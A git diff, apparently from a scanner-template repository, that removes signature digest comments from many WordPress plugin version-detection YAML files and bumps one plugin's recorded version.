http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 3 +-- http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - .../technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - .../technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - .../technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 201 files changed, 2 insertions(+), 202 deletions(-) diff --git a/helpers/wordpress/plugins/post-types-order.txt b/helpers/wordpress/plugins/post-types-order.txt index 047615559c..1506473e24 100644 --- a/helpers/wordpress/plugins/post-types-order.txt +++ b/helpers/wordpress/plugins/post-types-order.txt @@ -1 +1 @@ -2.2.4 \ No newline at end of file +2.2.6 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 57aea5ce3f..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022026b5cdc41ac86b8c52f76ffcf11e23b43ff1b2bad1647ee05d7ab252148d98f6022100fe5d9aa62a97d70ad9f893d7b656c6a531ebabe41fcea67c3c1d2a6063b886c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index b959399685..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d347a5f59faa3b996e097001d0081ff96ade7a9a6781cdde8f62a35474667d8302203753f29543fea947fb36271b701ebcdafc19e8c82c3b5e11f7fb1bbd68e0ae7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index ab376f8ff8..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205f35a830204f3b9dce4f12d4e5c98c40f571acdbfe3be14a4d67ab2e986cf68b022100e081208ec3696a3bf2bae081af3e996266dbc2b451952e3d79432a01fd58cda8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 6525963e13..cddbb4bb2e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022013642ec72c8cd6b4a12113dac1f8210e59f57528436d2cfef5d9585fd5cfd30e022002ca52537b485dc518c7d55fec8fbe01bd37486540c9302882965b14a84d9b79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 667f581889..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ec20b7fc7f9ab0ad800e48d2ce02534af95c67c647ff2c851e382d5facc036f8022100e9246f67d6c127d2f30a64329925cfa6b4f11fb1904640b9b3ac993303cb3212:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index e4a60d9f39..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009c0fd7f94e1d820ff0c931f7111ec32e7b5ad0e325f1ba1cd08f8c5c862ba75202202428fa6165b88aa0739f7348a20af2195aeb1f88baedcf8150d3677cac201137:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 5d45dc79c0..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b214056703cb95c7d59f69281b23cf7a2d759b46e9b848461e33a7be51aefccf02200e975be835baa07809d09161795767ed7a8702b5a351028f85567059b57d8e58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 485017f351..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220261cf253a8686a358a8d41b9bb06b480cbd33a7015361de328d14858bdbbd78902207ef84034f0be620ad1086add5d65befa5c8669559e8dcd81827e7199b68ffe13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92445fcd54..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fdfa2ab3150033ad7f1f7ee11876b77782a100c8a36125f794f59234f340199b022077b08c5484727776ba3e4100c652847fb48ef0681c444de50d625c39471c369c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index c8920c9900..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022004dfac004154d2562796f394f383ae2a58e157168571711ba3e8729f0382368502206c8bf8a84996062ca57c8f64ab567d4a6fa3fee001ab865a886911ec870bae19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 9a17923eec..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220368cf6a508b5e5fb753cb7f93bbb1df5f76cda1f2d6199364c2232c38be4b5330221008aa12ba57550f18c641b02e43a2468b5072ad9dc6f43ca8e0930dc34b94eba9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 7c272ef7a8..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008cec8d3631a8e7a1ad5d490bf1742bc87f9afc574a4e1229067a8277b0c008ba02204afb001d70aad15da037ba80649ad72b60683b5510361237bee861219bac4a3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index e6a276eadc..11cb41fb2c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210084c192f2756ea541b5edddc6d9f13f267e7a45e8b5fcdce2530493545901c54c02200b5dd4586eeac2be9a22103b61981f4930d8161fdaca84565ec9d9d0a68d76cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index d37d78b6a8..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203254aa2cd2ca2dbc1fe31a2fd67fba93362ca2b06994c0245f7974e50308ba5a02204edf26e17f3c998c29dffb6c310ac56d2da92d137920a4a5fe4385943ac2ea65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 399a56af20..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100989cc7c79d8bcc5d41f982bd211d5413a4ed44703ed8d7f96e6edff938e5053102207a7fc4d5662dd46372c7d2fd683c7053dbcfca32b748376711cb1e607ff516b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 6ef94efeea..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dd8f05d95d38ba12bc8c4e3cf4beb56f3ba7a3a326de4256a268a60dc50fbfad0220178aaa5ba52823f5368e943c8179c2eeae3c744c999d1f8be971ddaf7cfa4b93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index b04d3c0360..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c1a4864312a79a166f7fae24558966bbf799aa4f2bcbcaf083b2b986cef9d68f022100c051073295c0c7bc78a1cde39a9fb0540f7901c3e61a6f5ced296f8940d475ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index b458a4a4e0..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210088a69f0c4f7a0cd2b4ca482bfb047e297d848932afd0151c354cea1aa9055455022100a7d24e47aa5b0dfd1483e8beecb756f018ec8495553bf93ff03d4b3c9539e606:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index f479c14902..4e3c68c53a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100858581a676101d5b5dfa1be775ffbd68b95528aefdfbf331c752fd6faa98d59f02202223f53a76215b3d293862d6fcc58857e51efc01bb644e6ac3eb4483d32721f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 8d9e21a8dc..0cd866179e 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220322c1e6173e630126e7c1e51e2c94b95066610b7570331e0094a15f15e38b14b022100c26d06a7b554d3c58d6913789121ba60c77edc134d686b7ce0a1105f287d77d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 9c314b6035..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ff9f4df4ad1ecc966770b2d71391c5f6192eb8f26df337f453771e93a6cbc0bc022100d51828406ccd1e1ff1d06984e834cb48e8cc8caac4ad0044ab452868e58c2513:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 2e1b886ef6..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bf4a5bdf95af5b797d98e1f92c52a0128cf2bfd1445369960a02747959fd46870220773c6b2603a2b694b3ac57d00f507b22fbeb6b32ab532a9c8e43f12a7de00be0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index ca6c19647e..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e6cf138adbd78aa039973fbecea9b3cbe85ef72360799dcdcf79646da507d01c022100dfa2b97cef7d6ba28cfb9138d309964a671d70d86b2cd53b90cd4aff874a2999:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index b08e376d8b..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cddd9f50fcdc2cf780f85795ac2e71c47329a677f01adeec4850b44a6484129c022100ac5886e0d8d97073cb86d3d033660b90402050ed51081cde6980b804e9e6ff80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4f9719a7ec..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a93d9de20c921a544340c5726fb5cb5615b014a11188f881df297fe9f6451b0d022100d65ae59f5d74e832c40090ce0fb9ac9c8517b692064caeeaae153e75037cac85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index aa65d6bace..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203ae226f3b66df21e4d695137b54dc9809a2d4ebdc7a6c5414a656986d2493ebf022100ffacd2886fb9ee13cb67abf5f37d1cb4ddf48ac41df7a0ad001f7e456b5f211c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 94b9c1d263..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ba46ff4ee69ebcf6f199650056d603cf8c32c53e1ee0654c6877e7916387df4d02205a1dd5c0bdbbf3a5fa51de4bb8abbf9be0f9515976a7fffd741a43a1c520bb91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 8bdf0be87b..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201fa43e8644921d4aec78b240a750a627071f16125d9f58a733423ec006c83ee1022100a0f2239253b4f2da99d48c2017ddf20d3384eac24098e7db6bc5366b25d048c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 7257d477cf..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201b9815327fb3620bab3de15db0841c69d1833278844fb07d2130ca5d3e551bb4022100fe464ce7052a71f9a0d241f04c2ccd37da9fe1173226b4fb8dcbfb57ca56b0f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 8184660e76..4afaf9dc97 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008ca9cff48e9ac09028754adf55a152ebc4d18e49a81fc1ac0e0f2b2ab61d07b8022100ca531d8ac2ee0361a619c9b06af25d30c7f3f8feecec434f8b3236f5af7b1595:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 23ddd131aa..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204121adeeb69a6c95d02735668e51fbd26ad026fce793ab901d13449428dd441b02207535a4510c012d2b44c5dfedab842bc5cc0ed57a267f1e58a70beccbd1c968b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index f88a905a88..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210091d9b57d33b5c0ede36885420d665beb09cc1199909d1b45e02aa47ea43638d9022021e8166b9a9a4daae3f9708eeee5c0ffdcc390d76a232dcd388c51d4dba32621:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 7cb3695336..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c721b84bbd5dcf8bb773ab94b02a3b1c7276e640d0d2aa99cd524f4c64ce9e0a022100b41962dc5966e999c9b69fa8bc95c8d0aaf866e5e3984919764411c04366c1eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index f59c83ca5e..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bb39820bb0b8d524e3f09cc3a4181ba8f75c1ed6eb625204f6940cfd17fe98e4022100ff5bd5be06ef876e4e0fbc1eac7209b8aff1f831ff3f050be9ac4387c7a73dc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index ada5b3ddd7..bca0326f2b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e1f74c38384e457daf668db1ec6a854f62d0ec524780896a3a80d56812c83da7022100a8f558d87b5118647dc9ea530cdc496461dcd299b758cd22968a490b0f0cc6f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index eef0ea856b..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body 